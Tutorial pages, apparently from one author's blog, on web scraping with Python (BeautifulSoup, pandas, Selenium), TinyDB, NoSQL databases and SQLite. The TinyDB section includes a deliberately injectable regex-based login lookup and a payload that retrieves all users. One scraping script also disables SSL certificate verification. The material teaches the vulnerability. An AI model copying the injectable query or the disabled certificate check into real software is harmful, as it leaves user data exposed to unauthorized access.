Author: Giga Alqeeq

Data Scraping
Data Scraping

Data scraping is the process of extracting information from a target source and saving it into a file for further use. This target could be a website, an application, or any digital platform containing structured or unstructured data. The main goal of data scraping is to collect large amounts of data efficiently without manual copying, making it easier for organizations or individuals to gather the information they need for analysis or reporting.

The process often involves using automated tools or scripts, such as web crawlers, bots, or specialized scraping frameworks. These tools navigate the target source, locate the desired data, and extract it in a structured format such as CSV, JSON, or Excel. Depending on the source, data scraping may require overcoming challenges such as dynamic content, login requirements, or anti-bot measures. It is a technical process that requires careful handling to ensure accuracy and efficiency.

While data scraping focuses on data collection, the extracted information is often analyzed in a subsequent process called data mining. For example, a web crawler may scrape product details, prices, and reviews from e-commerce websites, and the collected data can then be analyzed to identify trends, patterns, or insights. By separating extraction from analysis, organizations can efficiently manage raw data and transform it into actionable intelligence, making data scraping a crucial first step in many data-driven workflows.

Web Scraping

Web Scraping is the automated process of extracting data from websites by using software tools or scripts to collect information directly from web pages. Websites can contain either static content, which is fixed in the page’s HTML and generally easier to scrape, or dynamic content, which is generated using JavaScript and may require more advanced tools or browser automation to access. Web scraping is commonly used for data collection, research, price monitoring, market analysis, and cybersecurity investigations. However, it is important to follow ethical and legal guidelines when scraping data, including reviewing the website’s terms of service and robots.txt file to ensure that scraping is permitted, as unauthorized data extraction may violate policies or laws.

Manual Web Scraping

The process of extracting data from webpages without using any scraping tools or features is convenient for very small amounts of content. Still, it becomes very complicated if the data is large or needs to be scraped more often. One of the great benefits of manual scraping is human review; every data point is checked by the person who scrapes it.

Manual Web Scraping (Example #1)

Getting all the URLs from this wiki page

Right click of the page and choose View Page Source

Search the page for the href html tags (This tag defines a hyperlink), click on Highlight All and copy them one by one, this will take very long time, what you can do is taking the content and paste it into a text editor, and use href=["'](?<link>.*?)['"] or (?<=href=")[^"]* regex

Save them into a file
```
href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
href="//upload.wikimedia.org"
href="//en.m.wikipedia.org/wiki/Malware"
href="/w/index.php?title=Malware&amp;action=edit"
href="/static/apple-touch/wikipedia.png"
href="/static/favicon/wikipedia.ico"
href="/w/opensearch_desc.php"
href="//en.wikipedia.org/w/api.php?action=rsd"
href="https://en.wikipedia.org/wiki/Malware"
href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
href="//meta.wikimedia.org"
href="//login.wikimedia.org"
...
...
...
```
Automated Web Scraping

This is done by utilizing tools that get the content and save it into files; Python has been heavily utilized for web scraping. There are different Python modules like beautifulsoup or pandas that are used for both scraping and mining.

Automated Web Scraping (Example #1)

The beautifulsoup module is good for getting all the URLs from a webpage, this method of scraping is limited, it works great with static content, but you cannot get dynamic content or a screenshot of the website using this method

Install beautifulsoup4 and lxml using the pip command

from bs4 import BeautifulSoup # Import BeautifulSoup for HTML parsing
from requests import get # Import get() to send HTTP requests
headers = {“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36”} # Mimic a real browser
response = get(“https://en.wikipedia.org/wiki/Main_Page”, headers=headers) # Send GET request with defied header
print(response.status_code) # Print HTTP status code (200 = OK)
soup = BeautifulSoup(response.text, ‘html.parser’) # Parse HTML content
for item in soup.find_all(href=True): # Loop through all tags containing an href attribute
print(item[‘href’]) # Print the link URL
```
from bs4 import BeautifulSoup
from requests import get
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"}
response = get("https://en.wikipedia.org/wiki/Main_Page", headers=headers)
print(response.status_code)
soup = BeautifulSoup(response.text, 'html.parser')
for item in soup.find_all(href=True):
    print(item['href'])
```
Output
```
href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
href="//upload.wikimedia.org"
href="//en.m.wikipedia.org/wiki/Malware"
href="/w/index.php?title=Malware&amp;action=edit"
href="/static/apple-touch/wikipedia.png"
href="/static/favicon/wikipedia.ico"
href="/w/opensearch_desc.php"
href="//en.wikipedia.org/w/api.php?action=rsd"
href="https://en.wikipedia.org/wiki/Malware"
href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
href="//meta.wikimedia.org"
href="//login.wikimedia.org"
...
...
...
```
Automated Web Scraping (Example #2)

The pandas module is good for getting all tables within a page, similar to the previous example, this method of scraping is limited, it works great with static content, but you cannot get dynamic content or a screenshot of the website using this method

Install pandas and lxml using the pip command

# bash /Applications/Python*/Install\ Certificates.command # macOS command to install SSL certificates if needed
import pandas as pd # Import pandas for data handling and HTML table parsing
import ssl # Import SSL module to handle HTTPS settings
ssl._create_default_https_context = ssl._create_unverified_context # Disable SSL certificate verification (useful when encountering certificate errors)
tables = pd.read_html(“https://goblackbears.com/sports/baseball/stats”) # Read all HTML tables from the given URL into a list of DataFrames
for i, table in enumerate(tables): # Loop through each table with its index
print(“Table %s\n” % i, table.head()) # Print table index and first 5 rows
```
import pandas as pd
tables = pd.read_html("https://goblackbears.com/sports/baseball/stats")
for i, table in enumerate(tables):
    print("Table %s\n" % i,table.head())
```
Output
```
Table 0
     0                                                  1
0 NaN  This article has multiple issues. Please help ...
1 NaN  This article needs to be updated. Please help ...
2 NaN  This article needs additional citations for ve...
Table 1
     0                                                  1
0 NaN  This article needs to be updated. Please help ...
Table 2
     0                                                  1
0 NaN  This article needs additional citations for ve...
Table 3
      Virus  ...                                              Notes
0     1260  ...   First virus family to use polymorphic encryption
1       4K  ...  The first known MS-DOS-file-infector to use st...
2      5lo  ...                            Infects .EXE files only
3  Abraxas  ...  Infects COM file. Disk directory listing will ...
4     Acid  ...  Infects COM file. Disk directory listing will ...

[5 rows x 9 columns]
Table 4
      vteMalware topics                                vteMalware topics.1
0   Infectious malware  Comparison of computer viruses Computer virus ...
1          Concealment  Backdoor Clickjacking Man-in-the-browser Man-i...
2   Malware for profit  Adware Botnet Crimeware Fleeceware Form grabbi...
3  By operating system  Android malware Classic Mac OS viruses iOS mal...
4           Protection  Anti-keylogger Antivirus software Browser secu...
```
Automated Web Scraping (Example #3)

One of the best web scraping techniques is using a headless browser, which means running a browser that runs without a graphical user interface (GUI). This was originally used for automated quality assurance tests but has recently been used for scraping. The main two benefits of using the headless browser is rendering dynamic content and behaving like a human browsing a website.

The following scripts will not run on Google Colab

Scrape using Firefox (with geckodriver setup)
1. Install the latest Firefox version
2. Install selenium using the pip command
3. Download the geckodriver from here (The Firefox application version has to match the webdriver version)
4. Extract the geckodriver and note the location (E.g., /scrape/geckodriver)
from selenium import webdriver # Import Selenium WebDriver
options = webdriver.firefox.options.Options() # Create Firefox options object
options.add_argument(“–headless”) # Run Firefox in headless mode (no GUI)
service = webdriver.firefox.service.Service(r’path to the geckodriver’) # Specify the local path to geckodriver executable
browser = webdriver.Firefox(options=options, service=service) # Launch Firefox with the specified options
browser.get(‘https://www.google.com’) # Open Google homepage
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print the full page text
browser.save_screenshot(“screenshot_using_firefox.png”) # Save a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
options = webdriver.firefox.options.Options()
options.add_argument("--headless")
service = webdriver.firefox.service.Service(r'path to the geckodriver')
browser = webdriver.Firefox(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_firefox.png")
browser.close()
browser.quit()
```
Scrape using Firefox (without geckodriver setup)
1. Install the latest Firefox version
2. Install selenium and webdriver-manager using the pip command
from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.firefox import GeckoDriverManager # Automatically download/manage GeckoDriver
options = webdriver.firefox.options.Options() # Create Firefox options object
options.add_argument(“–headless”) # Run Firefox in headless (no GUI) mode
service = webdriver.firefox.service.Service(GeckoDriverManager().install()) # Set up GeckoDriver service
browser = webdriver.Firefox(options=options, service=service) # Launch Firefox with specified options
browser.get(‘https://www.google.com’) # Open Google homepage
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print full page text
browser.save_screenshot(“screenshot_using_firefox.png”) # Capture a screenshot of the page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
from webdriver_manager.firefox import GeckoDriverManager
options = webdriver.firefox.options.Options()
options.add_argument("--headless")
service = webdriver.firefox.service.Service(GeckoDriverManager().install())
browser = webdriver.Firefox(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_firefox.png")
browser.close()
browser.quit()
```
Scrape using Chrome (with chromedriver setup)
1. Install the latest Chrome version
2. Install selenium using the pip command
3. Download the ChromeDriver from here (The chrome web browser version has to match the webdriver version)
4. Extract the ChromeDriver and note the location (E.g., /scrape/chromedriver)
from selenium import webdriver # Import Selenium WebDriver
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome in headless (no GUI) mode
options.add_argument(‘–no-sandbox’) # Disable sandbox (required in containers/VMs)
options.add_argument(‘–disable-dev-shm-usage’) # Prevent shared memory issues
service = webdriver.chrome.service.Service(r’path to the chromedriver’) # Specify the local path to chromedriver
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with specified options
browser.get(‘https://www.google.com’) # Open Google homepage
browser.save_screenshot(“screenshot_using_chrome.png”) # Take a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(r'path to the chromedriver')
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
Scrape using Chrome (without chromedriver setup)
1. Install the latest Chrome version
2. Install selenium and webdriver-manager using the pip command
from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager # Automatically download/manage ChromeDriver
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome in headless (no GUI) mode
options.add_argument(‘–no-sandbox’) # Disable sandbox (required in some environments)
options.add_argument(‘–disable-dev-shm-usage’) # Avoid shared memory issues in containers
service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Set up ChromeDriver service
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with specified options
browser.get(‘https://www.google.com’) # Open Google homepage
browser.save_screenshot(“screenshot_using_chrome.png”) # Capture a screenshot of the page
browser.close() # Close the browser
browser.quit()
```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(ChromeDriverManager().install())
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
Automated Web Scraping (Example #4 – Best Option)

You can run this one in google colab

Install latest chrome version

!apt update # Update the package list from repositories
!apt install libu2f-udev libvulkan1 # Install dependencies required by Google Chrome
!wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb # Download the Google Chrome .deb package
!dpkg -i google-chrome-stable_current_amd64.deb # Install the Chrome package manually
!apt –fix-broken install # Fix missing dependencies caused by dpkg install
!pip install selenium webdriver-manager # Install Selenium and Chrome driver manager via pip
```
!apt update
!apt install libu2f-udev libvulkan1
!wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
!dpkg -i google-chrome-stable_current_amd64.deb
!apt --fix-broken install 
!pip install selenium webdriver-manager
```
Scrape the website

from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager # Automatically manage ChromeDriver
from selenium.webdriver.common.by import By # Import locator strategies (e.g., XPATH)
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome without a visible window
options.add_argument(‘–no-sandbox’) # Disable sandbox (needed in containers/Colab)
options.add_argument(‘–disable-dev-shm-usage’) # Prevent shared memory issues
service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Install and configure ChromeDriver service
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with defined options
browser.get(‘https://www.google.com’) # Open Google homepage
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print page text using XPath
browser.save_screenshot(“screenshot_using_chrome.png”) # Save a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By 
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(ChromeDriverManager().install())
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://www.google.com')
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
If you want to wait until a website loads, you can use the sleep function

from selenium import webdriver # Import Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager # Automatically manage ChromeDriver
from selenium.webdriver.common.by import By # Import locator strategies (e.g., XPATH)
from time import sleep # Import sleep function
options = webdriver.chrome.options.Options() # Create Chrome options object
options.add_argument(‘–headless’) # Run Chrome without a visible window
options.add_argument(‘–no-sandbox’) # Disable sandbox (needed in containers/Colab)
options.add_argument(‘–disable-dev-shm-usage’) # Prevent shared memory issues
service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Install and configure ChromeDriver service
browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with defined options
browser.get(‘https://us.shop.battle.net/en-us’) # Open battle homepage
sleep(10) # Wait 10 seconds
# print(browser.find_element(By.XPATH, “/html/body”).text) # (Optional) Print page text using XPath
browser.save_screenshot(“screenshot_using_chrome.png”) # Save a screenshot of the loaded page
browser.close() # Close the browser window
browser.quit()
```
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By 
from time import sleep
options = webdriver.chrome.options.Options()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
service = webdriver.chrome.service.Service(ChromeDriverManager().install())
browser = webdriver.Chrome(options=options, service=service)
browser.get('https://us.shop.battle.net/en-us')
sleep(10)
#print(browser.find_element(By.XPATH, "/html/body").text)
browser.save_screenshot("screenshot_using_chrome.png")
browser.close()
browser.quit()
```
Anti Web Scraping

Many websites do not allow for web scraping, they usually implement anti-scraping methods to prevent users from scraping their content; therefore, scaling that process is a tough and tedious job. E.g., If you try to run the following script every second, you will be blocked and prompted with a message saying to slow down!

Example
```
import requests
import time
while True:
    res = requests.get("https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/043/211/original/ip-filter.blf")
    print(res.text)
    time.sleep(1)
```
Output
```
You have exceeded 5 requests to the blacklist in under one minute.  Please slow down.
```
Anti Web Scraping Techniques
- Fingerprinting
  - Getting info about the device using ip, user agents, system resources, etc..
- User Behavior Analysis
  - Analyze the user interaction with the resources and block them if they repeat the same pattern
- Authentication
  - Add login walls to resources
- Challenges
  - Add challenges like a captcha to reveal resources
- Honeypots
  - Add honeypots that log users and direct them to different resources if they violate the scraping policy
- Dynamic content
  - Switching from static content to dynamic content (The content changes dynamically during runtime)
- Randomizing identifiers
  - This is part of dynamic content, the content generates random identifiers
- Rate limits
  - Limit the number of users’ request
April 5, 2026
TinyDB
TinyDB

A document-oriented database written in pure Python, you will need to download and install it using the pip command

Install

pip # Python’s package manager
install # A command to download and install libraries from PyPI (Python Package Index
tinydb # a lightweight Python NoSQL database library
```
pip install tinydb
```
Create a Database

The TinyDB() function is used to connect to the local database or create a new one if the file does not exist

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
```
from tinydb import TinyDB
db = TinyDB('database.json')
```
List All Tables

You can list all tables using the .table() method, you do need to have data inside the table, otherwise it won’t be shown

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.tables() # List all tables in the TinyDB database
```
from tinydb import TinyDB
db = TinyDB('database.json')
db.tables()
```
Output
```
{'_default'}
```
Create a Table

Tinydb supports tables (You do not need to use them), to create a table use the .table() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
```
from tinydb import TinyDB
db = TinyDB('database.json')
table = db.table('users')
```
Delete Table

You can delete all the data within a database using the .drop_table() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
print(db.tables()) # Show all tables
```
from tinydb import TinyDB
db = TinyDB('database.json')
db.drop_table('users')
print(db.tables())
```
Output
```
{'_default'}
```
Insert Data

To add new data, use the .insert() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
table.insert({“id”: 1,”user”: “john”,”hash”: “e66860546f18”}) # Insert a new record (dictionary) into the ‘users’ table
table.insert({“id”: 2,”user”: “jane”,”hash”: “cdbbcd86b35e”, “car”:”ford”}) # Insert a new record (dictionary) into the ‘users’ table
```
from tinydb import TinyDB
db = TinyDB('database.json')
db.drop_table('users')
table = db.table('users')
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})
```
Output
Fetching Results

To fetch items from the database, use the .all() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
table.insert({“id”: 1,”user”: “john”,”hash”: “e66860546f18”}) # Insert a new record (dictionary) into the ‘users’ table
table.insert({“id”: 2,”user”: “jane”,”hash”: “cdbbcd86b35e”, “car”:”ford”}) # Insert a new record (dictionary) into the ‘users’ table
print(table.all()) # Retrieve and print all records from the ‘users’ table
```
from tinydb import TinyDB
db = TinyDB('database.json')
db.drop_table('users')
table = db.table('users')
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})
print(table.all())
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}, {'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'ford'}]
```
Find Data

You can fetch a specific data using the .search() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
table.insert({“id”: 1,”user”: “john”,”hash”: “e66860546f18”}) # Insert a new record (dictionary) into the ‘users’ table
table.insert({“id”: 2,”user”: “jane”,”hash”: “cdbbcd86b35e”, “car”:”ford”}) # Insert a new record (dictionary) into the ‘users’ table
results = table.search(where(‘user’) == ‘jane’) # Search the ‘users’ table for all records where the ‘user’ field equals ‘jane’
print(results) # Print the list of matching records
```
from tinydb import TinyDB, where
db = TinyDB('database.json')
db.drop_table('users')
table = db.table('users')
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})
results = table.search(where('user') == 'jane')
print(results)
```
Output
```
[{'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'ford'}]
```
Update Data

You can update data by using the .update() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
table.insert({“id”: 1,”user”: “john”,”hash”: “e66860546f18”}) # Insert a new record (dictionary) into the ‘users’ table
table.insert({“id”: 2,”user”: “jane”,”hash”: “cdbbcd86b35e”, “car”:”ford”}) # Insert a new record (dictionary) into the ‘users’ table
table.update({‘car’: ‘jeep’}, where(‘user’) == ‘jane’) # Update all records in the ‘users’ table where ‘user’ is ‘jane’, change the field ‘car’ with value ‘jeep’
print(table.all()) # Retrieve and print all records from the ‘users’ table
```
from tinydb import TinyDB, where
db = TinyDB('database.json')
db.drop_table('users')
table = db.table('users')
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})
table.update({'car': 'jeep'}, where('user') == 'jane')
print(table.all())
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}, {'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'jeep'}]
```
Delete Specific Data

You can delete data by using the .remove() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
table.insert({“id”: 1,”user”: “john”,”hash”: “e66860546f18”}) # Insert a new record (dictionary) into the ‘users’ table
table.insert({“id”: 2,”user”: “jane”,”hash”: “cdbbcd86b35e”, “car”:”ford”}) # Insert a new record (dictionary) into the ‘users’ table
table.remove(where(‘user’) == ‘jane’ # Remove all records in the ‘users’ table where ‘user’ is ‘jane’
print(table.all()) # Retrieve and print all records from the ‘users’ table
```
from tinydb import TinyDB, where
db = TinyDB('database.json')
db.drop_table('users')
table = db.table('users')
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})
table.remove(where('user') == 'jane')
print(table.all())
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}]
```
Delete All Data

You can delete all the data within a database using the .drop_table() method

from tinydb import TinyDB # Import the TinyDB class from the tinydb module
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
print(db.tables()) # Retrieve and print all tables
```
from tinydb import TinyDB
db = TinyDB('database.json')
db.drop_table('users')
print(db.tables())
```
Output
```
{'_default'}
```
User Input (NoSQL Injection)

A threat actor can construct a malicious query and use it to perform an authorized action

rom tinydb import TinyDB # Import the TinyDB class from the tinydb module
temp_user = input(“Enter username: “) # Prompt the user to enter a username
temp_hash = input(“Enter password: “) # Prompt the user to enter a password (Usually, there will be a function to hash the password, it’s removed from here)
db = TinyDB(‘database.json’) # Create (or open) a TinyDB database stored in a JSON file named ‘database.json’, if the file doesn’t exist, TinyDB will create it automatically
db.drop_table(‘users’) # Delete the entire table named ‘users’ from the TinyDB database
table = db.table(‘users’) # Access (or create if it doesn’t exist) a table named ‘users’ in the TinyDB database
table.insert({“id”: 1,”user”: “john”,”hash”: “e66860546f18”}) # Insert a new record (dictionary) into the ‘users’ table
table.insert({“id”: 2,”user”: “jane”,”hash”: “cdbbcd86b35e”, “car”:”ford”}) # Insert a new record (dictionary) into the ‘users’ table
if len(temp_hash) == 12: # Check if hash value length is 12
results = table.search(Query().user.search(temp_user) & Query().hash.search(temp_hash)) # Search the table for records where the ‘user’ field matches temp_user and the ‘hash’ field matches temp_hash using regex search
print(results) # Print all results
```
from tinydb import TinyDB, Query
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
db = TinyDB('database.json')
db.drop_table('users')
table = db.table('users')
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})
if len(temp_hash) == 12:
    results = table.search(Query().user.search(temp_user) & Query().hash.search(temp_hash))
    print(results)
```
Malicious statement

If a user enters [a-zA-Z0-9]+ for the username and any password, it will pass the length check, then the users john and jane will be triggered by the regex pattern (When TinyDB evaluates Query().user.search(temp_user), it’s not searching literally for [a-zA-Z0-9]+, Instead, it treats that as a regex pattern, which will match any username composed of letters/numbers.)
```
[a-zA-Z0-9]+ detects on john -> True, retrieve this user
[a-zA-Z0-9]+ detects on jane -> True, retrieve this user
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}, {'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'ford'}]
```
April 5, 2026
Non-Relational Databases
Non-Relational Databases

Non-relational databases, often called NoSQL databases, are designed to store data in a more flexible format compared to relational databases. They can handle structured, semi-structured, and unstructured data, making them ideal for modern applications that deal with diverse data types. Instead of tables with fixed rows and columns, non-relational databases use user-defined models such as documents, key-value pairs, wide columns, or graphs. This flexibility allows developers to easily adapt the database to changing requirements without redesigning the entire schema.

Non-relational databases organize data according to the chosen data model. For example, document databases like MongoDB store data as JSON-like documents, while key-value stores like Redis store data as key-value pairs. Graph databases, on the other hand, focus on relationships between data points, making them ideal for social networks or recommendation systems. Unlike relational databases, non-relational databases often do not enforce strict schemas or relationships, allowing rapid development and the handling of large-scale, dynamic datasets.

Non-relational databases are widely used in applications that require high scalability, performance, and flexibility, such as big data analytics, real-time web applications, and content management systems. They can efficiently manage large volumes of diverse data and are often horizontally scalable, meaning they can distribute data across multiple servers. Popular non-relational databases include MongoDB, Cassandra, Redis, and Neo4j, each optimized for specific use cases. Their ability to handle various data types and adapt to changing requirements makes them a critical component in modern data architectures.

Example

A database that has a collection of 2 documents that have different key:value pairs
```
[
  {
    "id": 1,
    "user": "john",
    "hash": "e66860546f18"
  },
  {
    "id": 2,
    "user": "jane",
    "hash": "cdbbcd86b35e",
    "car": "ford"
  }
]
```
Non-Relational Databases Pros and Cons
- Pros of Non-Relational Databases (NoSQL)
  - Flexible Schema
    
    No fixed tables or columns; can store structured, semi-structured, and unstructured data.
    
    Easy to adapt to changing application requirements without redesigning the database.
  - High Scalability
    
    Designed for horizontal scaling across multiple servers, ideal for handling large datasets.
  - Performance
    
    Optimized for high-throughput reads/writes, making them suitable for real-time applications.
  - Diverse Data Models
    
    Support for documents (MongoDB), key-value pairs (Redis), wide-columns (Cassandra), and graphs (Neo4j) allows flexibility for different use cases.
  - Rapid Development
    
    Lack of strict schema enforcement allows faster development cycles.
  - Big Data and Analytics
    
    Well-suited for large-scale, dynamic datasets and big data applications.
- Cons of Non-Relational Databases
  - Lack of Standardization
    
    No universal query language like SQL; each database has its own API or query syntax.
  - Data Consistency Challenges
    
    Many NoSQL systems prioritize availability and partition tolerance over strict consistency (CAP theorem).
  - Complex Relationships
    
    Difficult to enforce relationships between datasets compared to relational databases.
  - Limited Transaction Support
    
    ACID transactions may be limited or unavailable in some NoSQL databases.
  - Tooling and Expertise
    
    Smaller ecosystem compared to mature RDBMS systems; may require specialized knowledge.
  - Data Duplication
    
    Denormalization is common, which can increase storage requirements and complicate updates.
April 5, 2026
SQLite
SQLite3

SQLite is a lightweight disk-based database library written in C. You can use the SQLite3 binary directly from the command line interface after installing it or the SQLite3 Python module that’s built-in.

Command-Line Interface
```
sqlite>
```
Python
```
import sqlite3
```
Create a Database

The .connect()method is used to connect to the local database or create a new one if the file does not exist

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> .quit # Exit the SQLite command-line interface
```
